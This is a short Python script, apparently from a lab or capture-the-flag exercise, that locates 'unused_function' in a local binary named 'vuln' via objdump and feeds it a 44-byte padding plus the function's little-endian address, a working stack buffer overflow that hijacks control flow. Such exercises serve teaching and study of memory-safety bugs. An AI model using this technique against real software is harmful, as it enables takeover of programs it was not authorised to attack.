blob: 6ec37e5f618436ffec6f7df64c8eb96df24af2d8 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
#!/usr/bin/env python3
import subprocess
print("locating address of unused_function...")
objdump_output = subprocess.check_output(['objdump', '-d', './vuln'], text=True)
for line in objdump_output.split('\n'):
if '<unused_function>:' in line:
address_hex = line.split()[0]
address_bytes = bytes.fromhex(address_hex)[::-1]
print(f"found address (little endian): {str(address_bytes)}")
break
payload = b'A' * 44 + address_bytes
subprocess.run(["./vuln", payload])
|
